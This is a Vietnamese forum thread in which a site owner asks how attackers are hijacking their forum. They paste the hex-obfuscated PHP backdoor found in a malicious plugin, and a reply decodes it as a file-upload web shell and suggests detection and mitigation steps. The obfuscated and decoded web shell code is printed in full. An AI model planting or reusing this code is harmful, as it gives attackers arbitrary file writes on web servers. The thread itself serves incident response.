<![CDATA[Latest posts for the topic "Cách thức hack như thế này và cách khắc phục?"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Cách thức hack như thế này và cách khắc phục? Hiện tại site em đang có một số kẻ phá hoại, không biết chúng dùng cách gì mà mỗi khi member click vào một box trên diễn đàn nó sẻ tới trang Login, yêu cầu đăng nhập Còn admin khi click vào sẽ chuyển đến trang Plugin và Add một Plugin mới với Shellcode bên trong có nội dung bên dưới Mong được ace giúp đỡ, nguyên nhân và cách khắc phục Cảm ơn! Code:
eval("\x20\x69\x66\x20\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x64\x6f\x27\x5d\x3d\x3d\x27\x6c\x6f\x61\x64\x27\x29\x7b\xd\xa\x20\x24\x66\x69\x6c\x65\x73\x20\x3d\x20\x40\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x66\x69\x6c\x65\x73\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x20\x21\x3d\x20\x27\x27\x29\x7b\xd\xa\x20\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x20\x3d\x20\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x70\x61\x74\x68\x22\x5d\x2e\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x66\x69\x6c\x65\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27\x5d\x2c\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x29\x29\x20\x65\x63\x68\x6f\x20\x22\x3c\x68\x31\x3e\x3c\x61\x20\x68\x72\x65\x66\x3d\x27\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x27\x3e\x4f\x4b\x2d\x43\x6c\x69\x63\x6b\x20\x68\x65\x72\x65\x21\x3c\x2f\x61\x3e\x3c\x2f\x68\x31\x3e\x22\x3b\xd\xa\x20\x7d\xd\xa\x20\x64\x69\x65\x28\x27\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x50\x4f\x53\x54\x20\x65\x6e\x63\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x22\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\x61\x6d\x65\x3d\x70\x61\x74\x68\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x73\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x73\x75\x62\x6d\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\x22\x55\x70\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\x27\x29\x3b\xd\xa\x20\x7d\xd\xa");
]]> /hvaonline/posts/list/43835.html#271195 /hvaonline/posts/list/43835.html#271195 GMT Cách thức hack như thế này và cách khắc phục? Code:
if ($_REQUEST['do']=='load'){
 $files = @$_FILES["files"];
 if($files["name"] != ''){
 $fullpath = $_REQUEST["path"].$files["name"];
 if(move_uploaded_file($files['tmp_name'],$fullpath)) echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
 }
 die('<form method=POST enctype="multipart/form-data" action="">
 <input type=text name=path>
 <input type="file" name="files"><input type=submit value="Up"></form>');
 }
Nó chỉ là một đoạn mã upload thôi, bạn vào php.ini tạm thời disable hàm "move_uploaded_file". Tìm các requets trong accesslog chứa "?do=load" Tìm các file php chứa "eval("\x20\x69\x66\x20\x28\x24". Chúc bạn sớm khắc phục được :D.]]> /hvaonline/posts/list/43835.html#271388 /hvaonline/posts/list/43835.html#271388 GMT Cách thức hack như thế này và cách khắc phục? /hvaonline/posts/list/43835.html#271482 /hvaonline/posts/list/43835.html#271482 GMT